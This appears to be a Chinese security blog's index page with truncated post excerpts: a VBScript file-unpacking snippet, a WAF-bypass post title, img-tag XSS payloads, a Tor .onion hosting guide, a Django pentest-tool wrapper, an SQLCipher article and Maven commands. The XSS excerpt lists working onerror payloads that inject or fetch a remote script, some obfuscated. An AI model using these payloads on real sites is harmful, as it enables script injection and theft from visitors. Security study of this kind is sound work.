Dim rs, fso, conn, stream, connStr, theFolder Set rs = CreateObject(“ADODB.RecordSet”) Set stream = CreateObject(“ADODB.Stream”) Set conn = CreateObject(“ADODB.Connection”) Set fso = CreateObject(“Scripting.FileSystemObject”) connStr = “Provider = Microsoft.Jet.OLEDB.4.0; Data Source =Test.mdb;” If Not fso.FileExists(“Test.mdb”) Then Dim PackFile PackFile = InputBox(“输入要解包的完整路径:”, “文件解包”, “C:\Test […]
Author: 系统自定义
密码保护:关于WTS-WAF云盾拦截Bypass记录
使用img标签实现xss的常见方法
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script’)).src=”domain.js”></img> <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js'”></img> <img src=1 onerror=jQuery.getScript(“domain.js”)> <img src=”#” onerror=”$.getScript(‘domain.js’)”> <img src=”#” onerror=”var a=String.fromCharCode(47);$.g […]
如何创建一个 Tor .onion 网站
Tor 隐藏服务使用 .onion 域名。我将向你演示如何创建一个安全配置以阻止信息泄露、隐藏服务的 .onion 网站。 注意:这是严肃的话题。本向导目标是乐于运行 Linux 服务器的人群。注意安全。 一些基本提示: 不要在这台服务器上运行或做其它事情。 在新服务器或 VPS 上进行全新安装。 不要保留或运行来自 VPS 提供商那儿的任何服务。 用 Paypal 支付你的 VPS 服务,不过最好使用 Bitcoin。 不要向 VPS 提供关于你的任何身份信息。 不要在这台服务器上运行 Tor 中继,因为 Tor 中继在真实世界的公开 IP 是公开的。 不要从这台服务器发送电子邮件。 不要运行讨厌的或卑鄙的 web 软件。如果你的 web 软件有管理员登陆或管理员账号,把密码改成复杂的 26 个字符组成的密码。很多 Tor 网站被攻破只是某人猜到了管理员登陆密码。 避免使用任何 Java […]
基于Django框架完成的WebTools
用此框架添加常用的安全测试渗透工具,集成到web中. 基本的运行原理是利用web页面去调用系统相关程序,并通过页面执行CML回显到页面中.部署到远程服务器中,就不用到哪都携带各种测试工具了…. 也方便集成工具.Oh.Year…. 一切基于django框架开发….,部分功能调用网络接口及爬虫获取. 后台登录页面: 后台用户权限管理页面: 集成工具展示页面.
SQLCipher之攻与防
0x00 SQLCipher 在移动端,不管是iOS还是Android,开发人员用的最多的本地数据库非SQlite莫属了。SQLite是一个轻量的、跨平台的、开源的数据库引擎,它的在读写效率、消耗总量、延迟时间和整体简单性上具有的优越性,使其成为移动平台数据库的最佳解决方案。 但是,用SQLite保存一些不是很敏感的信息还可以接受,存储敏感信息就值得商榷了,免费版的SQLite中的信息是明文存放的,你甚至直接用文本编辑器打开都可以看到敏感内容,比如下面这个: 其实SQLite是提供了加密功能的,即SQLite Encryption Extension (SEE),但是,要收费!还不便宜,2000刀。Coder们穷啊,于是大家寻找免费的解决方案,最终SQLCipher成了比较理想的选择,因为它免费、开源,而其它家的SQLiteEncrypt、SQLiteCrypt等还是要收费。 SQLCip […]
Maven 直接打包可执行jar包命令
mvn clean package -DiskipTests OR mvn compile package 生成的jar文件在打包目录的target文件夹下. 如果提示缺少jar包,可以手动导入jar包到本地repo: mvn install:install-file -Dfile=matt-autocode-1.0.0.jar -DgroupId=com.zeei -DartifactId=common -Dversion=1.0.0 -Dpackaging=jar 按照自己需要的,分别替换:文件名(-Dfile=?),组名(-DgroupId=?), jar包名(-DartifactId=?),jar包版本(-Dversion=?) 注意此处的的这些参数要与pom.xml文件中声明的一致,例如: mvn install:install-file -Dfile=interface-0.0 […]